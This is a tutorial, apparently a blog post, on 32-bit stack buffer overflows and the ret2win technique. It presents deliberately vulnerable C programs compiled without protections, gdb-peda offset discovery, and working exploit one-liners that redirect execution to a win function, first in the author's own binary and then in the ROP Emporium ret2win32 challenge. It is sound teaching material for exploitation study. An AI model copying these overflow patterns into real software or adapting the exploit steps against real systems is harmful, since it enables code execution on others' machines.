
Buffer Overflow: The Dark Art of Exploiting Memory

Author: Aditya Hebballe
OSCP Certified Penetration Tester

Getting Started
#

A buffer overflow occurs when a program writes more data to a buffer (a contiguous block of memory) than it can hold, leading to adjacent memory locations being overwritten.

In this post, we will start with an introduction to stack-based buffer overflows and then explore a technique called ret2win.

For example, here is a program whose read cannot overflow its buffer:

#include <stdio.h>
#include <unistd.h>

int secure(){
	char buffer[200];
	int input;
	input = read(0, buffer, 200); //matches the buffer size
	printf("\n[+] user supplies: %d-bytes!", input);
	printf("\n[+] buffer content --> %s!", buffer);
	return 0;
}
int main(int argc, char * argv[]){
	secure();
	return 0;
}

Compile it:

gcc -m32 secure.c -o notvulnerable

No matter how many characters we pass, at most 200 bytes end up in the buffer. This is because the third argument to read caps the number of bytes it stores, and here that cap matches the buffer size.
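To make the role of that size argument concrete, here is a toy Python model (not real process memory) of a small buffer followed by adjacent data. The 8-byte buffer, the 4-byte neighbour and the names bounded_read and fresh_memory are assumptions chosen only for illustration.

```python
# Toy model: an 8-byte "buffer" followed by 4 bytes of adjacent data.
BUF_SIZE = 8  # hypothetical size, chosen to keep the output short


def bounded_read(memory: bytearray, data: bytes, limit: int) -> int:
    """Copy at most `limit` bytes of `data` to the start of `memory`,
    the way read(0, buffer, limit) caps how much it stores."""
    chunk = data[:limit]
    memory[:len(chunk)] = chunk
    return len(chunk)


def fresh_memory() -> bytearray:
    # zeroed buffer + adjacent data that should never change
    return bytearray(BUF_SIZE) + bytearray(b"SAFE")


user_input = b"A" * 12

safe = fresh_memory()
bounded_read(safe, user_input, BUF_SIZE)        # limit matches the buffer
print(safe[BUF_SIZE:])                          # bytearray(b'SAFE')

unsafe = fresh_memory()
bounded_read(unsafe, user_input, BUF_SIZE * 2)  # limit larger than the buffer
print(unsafe[BUF_SIZE:])                        # bytearray(b'AAAA')
```

With a limit larger than the buffer, the extra input bytes land in whatever sits next to it.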

Now this is an example program susceptible to buffer overflow:

#include <stdio.h>
#include <unistd.h>

int overflow(){
	char buffer[200];
	int input;
	input = read(0, buffer, 400); //doesn't match the buffer size
	printf("\n[+] user supplies: %d-bytes!", input);
	printf("\n[+] buffer content --> %s!", buffer);
	return 0;
}
int main(int argc, char * argv[]){
	overflow();
	return 0;
}


Let’s compile it as a 32-bit binary for simplicity, and without buffer-overflow protections for demonstration purposes:

gcc -m32 -fno-stack-protector -no-pie -o vulnerable Overflow.c

Here’s what each flag does:

  • -m32: Compile the code for a 32-bit architecture.
  • -fno-stack-protector: Disable stack canaries, the compiler-inserted checks that detect a smashed stack before a function returns.
  • -no-pie: Compile the code without Position Independent Executable (PIE) support, meaning the code’s memory addresses will be fixed.

Now let’s look at the binary in gdb. It should not be stripped, so that we can see the function names easily. Stripping removes the symbol tables, which include function and variable names. This is usually done for production binaries, while developers keep an unstripped copy for debugging.

A stripped binary is harder to disassemble in GDB because functions can no longer be looked up by name (it can still be done, of course).
To check the file’s properties:

file vulnerable

As we can see, it’s a 32-bit binary.

Understanding the Basics
#

We will use gdb-peda, so install it first.

Let’s start gdb with our vulnerable binary and list the functions:

gdb -q ./vulnerable
info functions

We can see all the functions in the binary.

Let’s try disassembling the main function as an example:

disas main

Let’s break down what we see: the memory addresses, and of course the instructions and the registers they operate on.

Registers are small storage locations in the CPU that hold data, addresses, or control information for quick access during execution. Instructions are commands that the CPU executes, specifying operations to perform on data stored in registers or memory. Don’t confuse instructions with registers. Here are a few examples:

  • Registers
    • EIP: Points to the next instruction.
    • ESP: Points to the top of the stack.
    • EBP: Points to the base of the current stack frame.
  • Instructions
    • ret: Returns control to the calling function.
    • call: Calls a function, saving the return address.
    • jmp: Unconditionally jumps to a specified address.

EIP, the instruction pointer, holds the address of the next instruction to be executed. In a buffer overflow (BOF), the return address saved on the stack is overwritten, which means the function can no longer return to its caller to finish what it started. Instead, when the function attempts to return (using the ret instruction), execution jumps to the new address rather than the intended one.

The call instruction places the return address at the top of the stack.

The return address is placed on the stack when a function is called, waiting to be used for restoring the execution flow. When the function completes and executes the ret instruction, it takes the value from the top of the stack (pointed to by the ESP register) and loads it into the EIP register. This action restores the execution flow to the original program, allowing it to resume from where the function was called. Thus, the function successfully exits and control returns to the calling code.
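If it helps, the call/ret behaviour can be sketched as a toy simulation in Python. This is only a model: the ToyCPU class and every address in it are made up, and a real stack holds much more than return addresses.

```python
# Toy model of call/ret (all addresses are hypothetical).
class ToyCPU:
    def __init__(self):
        self.eip = 0x1000  # address of the instruction being executed
        self.stack = []    # the last element plays the role of the top (ESP)

    def call(self, target: int, insn_len: int = 5) -> None:
        """Push the address of the instruction after the call, then jump."""
        self.stack.append(self.eip + insn_len)
        self.eip = target

    def ret(self) -> None:
        """Pop the value on top of the stack into EIP."""
        self.eip = self.stack.pop()


cpu = ToyCPU()
cpu.call(0x2000)
cpu.ret()
print(hex(cpu.eip))     # 0x1005: execution resumes right after the call

cpu = ToyCPU()
cpu.call(0x2000)
cpu.stack[-1] = 0x3000  # an overflow overwrites the saved return address
cpu.ret()
print(hex(cpu.eip))     # 0x3000: ret jumps wherever that value points
```

The second run is the whole idea behind the attack: ret does not check where the value on the stack came from.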

It’s alright if you didn’t understand all of that. Once we get going, it will slowly start to make sense.

Exploiting
#

This is the general outline we will follow (assuming that there are no defence mechanisms in place):

  1. Segfault/Crash: Crash or overflow the program
  2. Eip-offset: Find out how many bytes it takes to reach the saved return address
  3. Eip-overwrite: Confirm the offset with the legendary “B test”
  4. Shellcode/ret2-based attacks: Use shellcode if NX/DEP is absent, or ret2* if it is present
  5. Pwned: <insert happy hacker noises>

Now that I’ve explained the basics, think about what would happen if we overflowed the buffer just enough to reach the saved return address and put an address of our own there. That’s right! ret would load it into EIP, and we could execute whatever we want.

Now let’s go through the steps.

Crashing
#

Now let’s try to crash the program. Let’s use an obscenely large number of characters:

python -c 'print("A"*500)' | ./vulnerable

Yup it crashed. Onto the next step!
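If you would rather confirm the crash from a script than by eye, something like the following sketch works on Linux. The helper name crashes_with_segfault is hypothetical, and the demo call uses a harmless Python child process as a stand-in so the snippet runs anywhere; to test the real target you would pass ["./vulnerable"] instead.

```python
import signal
import subprocess
import sys


def crashes_with_segfault(argv: list, payload: bytes) -> bool:
    """Run argv with payload on stdin; True if the child died from SIGSEGV."""
    result = subprocess.run(
        argv,
        input=payload,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    # On POSIX, a negative return code is the number of the signal
    # that killed the child process.
    return result.returncode == -signal.SIGSEGV


# Stand-in target that just reads stdin and exits cleanly.
harmless = [sys.executable, "-c", "import sys; sys.stdin.buffer.read()"]
print(crashes_with_segfault(harmless, b"A" * 500))  # False

# Against the binary from this post (assumes ./vulnerable exists):
# print(crashes_with_segfault(["./vulnerable"], b"A" * 500))
```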

Eip-offset
#

How many bytes does it take to reach EIP? There are two ways to find out:

  1. Increase the number of bytes until the program crashes
  2. A better approach: create a pattern and check which part of it ends up in EIP to get the offset

To detect the overflow into EIP we will use a cyclic pattern. gdb-peda has a built-in pattern command for this:

pattern create 600

Beautiful!

For our vulnerable program, a 400-byte pattern is enough, since read accepts at most 400 bytes (we know this only because we have the source code):

pattern create 400 pattern.txt

Now let’s pass the pattern into the program. We set a catchpoint so that GDB stops on a segmentation fault:

gdb ./vulnerable
catch signal SIGSEGV
r < pattern.txt

GDB stops with part of the pattern in EIP, so now we can look up its offset:

pattern offset 0x4325416e

The offset is 216 bytes.
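To see how a pattern lookup like this works under the hood, here is a minimal sketch in Python. It is not PEDA's algorithm: it uses the simpler "Aa0Aa1Aa2..." scheme, so a value taken from a PEDA pattern will not be found in it, and the function names are my own.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern out of upper/lower/digit triples."""
    out = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(eip: int, length: int) -> int:
    """Return where the 4 bytes found in EIP occur in the pattern, or -1."""
    needle = struct.pack("<I", eip)  # EIP holds the bytes in little-endian order
    return pattern_create(length).find(needle)


pattern = pattern_create(400)
# Pretend the crash left pattern bytes 216..219 in EIP.
fake_eip = struct.unpack("<I", pattern[216:220])[0]
print(pattern_offset(fake_eip, 400))  # 216
```

The trick is that every 4-byte window of the pattern is unique, so whatever lands in EIP identifies exactly one position.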

Eip-overwrite
#

We need to check that we can write a value of our choice into EIP. Since the offset is 216, let’s pass in 216 A’s followed by 4 B’s (4 because an address is 4 bytes, or 32 bits):

python -c 'print("A"*216 + "BBBB")' > EIP_offset.txt

If the overwrite works, EIP will contain 0x42424242, the hex value of BBBB.

gdb -q ./vulnerable
catch signal SIGSEGV
r < EIP_offset.txt

EIP contains 0x42424242, which is BBBB, so the offset is confirmed.

Shellcode/ret2*-based attacks
#

To check security measures:

pwn checksec ./vulnerable

We can’t use a shellcode attack here because the NX bit makes the stack non-executable.

The NX (No-eXecute) bit is a security feature of modern processors that prevents marked regions of memory, such as the stack, from being executed as code.
We will use a ret2-based attack instead, which needs a function inside the binary that we can return to. So let’s create one (you obviously can’t do this with binaries for which you don’t have the source code; there you would use a function that already exists).

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int hackme()
{
	// never called by main; reachable only by hijacking the return address
	system("touch hacked.txt && ls -la");
	return 0;
}
int overflow(){
    char buffer[200];
    int input;
    input = read(0, buffer, 400); //doesn't match the buffer size
    printf("\n[+] user supplies: %d-bytes!", input);
    printf("\n[+] buffer content --> %s!", buffer);
    return 0;
}

int main(int argc, char * argv[]){
    overflow();
    return 0;
}

In this program, the hackme function is never called under normal circumstances, which means it cannot be executed. However, by exploiting BOF in the binary, we can “hack” it and force the execution of the hackme function. This demonstrates how we can manipulate the program’s control flow to run code that is otherwise inaccessible.

Now we can find the address for the hackme function:

gdb -q ./vulnerable
info functions

We have the address of the hackme function. We can also get it by using:

p hackme

GDB prints 0x8049186 with only seven hex digits because it drops the leading zero; the full 32-bit address is 0x08049186.

Disassembling hackme function:

disas hackme

There is a call to system with a push just above it. When an address is pushed right before a call, it is likely an argument to the called function (system() in this case).

The address 0x8049060 is the Procedure Linkage Table (PLT) entry for the system function.

Examining the address being pushed:

As expected, it holds the argument passed to the system() function.

Note! Since x86 is a little-endian architecture, we need to keep endianness in mind when writing addresses into memory.
Endianness is the order in which the bytes of a larger data type (such as an integer) are arranged in memory. There are two types: big-endian (most significant byte first) and little-endian (least significant byte first).
Example, for evil_function = 0xdeadbeef:

  • Big-endian: stored in memory as de ad be ef
  • Little-endian: stored in memory as ef be ad de

Our payload has to be little-endian, as that is what x86 uses. Basically, we need to write the bytes of an address in reverse order, least significant byte first.
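Rather than reversing bytes by hand, we can let Python's struct module do it. A small sketch using the hackme address from earlier (the variable names are my own):

```python
import struct

hackme_addr = 0x8049186                  # as printed by GDB
print(f"{hackme_addr:#010x}")            # 0x08049186, padded to 8 hex digits

packed = struct.pack("<I", hackme_addr)  # "<I" = little-endian unsigned 32-bit
print(packed.hex())                      # 86910408

big = struct.pack(">I", hackme_addr)     # big-endian, for comparison
print(big.hex())                         # 08049186
```

The little-endian result is exactly the byte sequence that has to appear in the payload.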

Pwned
#

We need a payload of the form payload = padding + hackme_addr:

  • padding: 216 bytes, the offset we discovered
  • hackme_addr: 0x08049186, written in little-endian byte order as \x86\x91\x04\x08

Let’s use Python to generate the payload. Python 2 is slightly easier because its print writes escapes such as \x86 as raw bytes, whereas Python 3 has to write the bytes through sys.stdout.buffer.

python2 -c 'print("A" * 216 + "\x86\x91\x04\x08")' | ./vulnerable
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 216 + b"\x86\x91\x04\x08")' | ./vulnerable

We have executed the hackme() function, even though main never calls it. We have successfully hacked the program.
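If you plan to reuse this for other binaries, the one-liner can be wrapped in a small helper. This is just a sketch: build_payload and its filler parameter are names I made up, and it only covers this simple case of padding followed by one 32-bit address.

```python
import struct


def build_payload(offset: int, target: int, filler: bytes = b"A") -> bytes:
    """Padding up to the saved return address, then the new address
    packed as a little-endian 32-bit value."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return filler * offset + struct.pack("<I", target)


payload = build_payload(216, 0x08049186)
print(len(payload), payload[-4:].hex())  # 220 86910408
```

To feed it to the binary, write payload with sys.stdout.buffer.write(payload) and pipe the script's output into ./vulnerable, just like the python3 one-liner.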

Capstone Exercise
#

We will solve a challenge called ret2win from https://ropemporium.com/. We will solve the x86 version, but the x86_64 version can be solved similarly.

We don’t have the source code in this case.

Unzip it and you’ll have the ret2win32 binary. Let’s check the security measures:

pwn checksec ./ret2win32

We have NX enabled so we can’t use shellcode.

To print the sequences of printable characters in the binary:

strings ret2win32

Or use this for better output:

rabin2 -z ret2win32

rabin2 is part of radare2.

Okayyyyyyy let’s execute it:

./ret2win32

Now let’s try to overflow it:

python3 -c 'print("A"*100)' | ./ret2win32

Let’s check dmesg. We could also use GDB but this is quicker.

sudo dmesg

So what is 41414141? Each 0x41 byte is:

printf '\x41' | xxd

It is A.
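The same check can be done in Python for the whole register value at once. A tiny sketch (eip_as_text is a hypothetical helper name):

```python
def eip_as_text(value: int) -> bytes:
    """Turn a 32-bit register value back into the 4 input bytes behind it."""
    return value.to_bytes(4, "little")


print(eip_as_text(0x41414141))  # b'AAAA'
print(eip_as_text(0x42424242))  # b'BBBB'
```

This comes in handy once the bytes in the register are no longer all the same letter.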

So we can overflow it.

Let’s add catch signal SIGSEGV to our config at ~/.gdbinit, as it gets annoying typing it every time:

set debuginfod enabled on
source ~/.peda/peda.py
catch signal SIGSEGV

Start gdb and let’s find the offset.

gdb -q ./ret2win32
pattern create 100 pattern.txt
r < pattern.txt

Let’s copy the address in EIP and find the offset:

pattern offset 0x41414641

So 44 is the offset.

Let’s check with the “B test”:

python3 -c 'print("A"*44 + "BBBB")' | ./ret2win32

Now check logs:

sudo dmesg

0x42424242 is BBBB so it worked.

Now we can use a ret2 attack, since NX rules out shellcode.

We’ll find some function to return to.

We have a pwnme function.

Disassembling it:

disas pwnme

We see a lot of calls to puts, so this is probably the function that printed the output we saw when the program ran. We can confirm this by examining the addresses being pushed:

Let’s try disassembling the ret2win function:

disas ret2win

Let’s examine the push above the system function:

x/s 0x8048813

Bingo! This is the function we are going to use.
Writing the address of ret2win (0x0804862c) in little-endian order and passing it in after the offset:

python2 -c 'print("A"*44 + "\x2c\x86\x04\x08")' | ./ret2win32

And there we have it: we have successfully hacked it.

Stay tuned for more content on Reverse Engineering, thank you for reading!
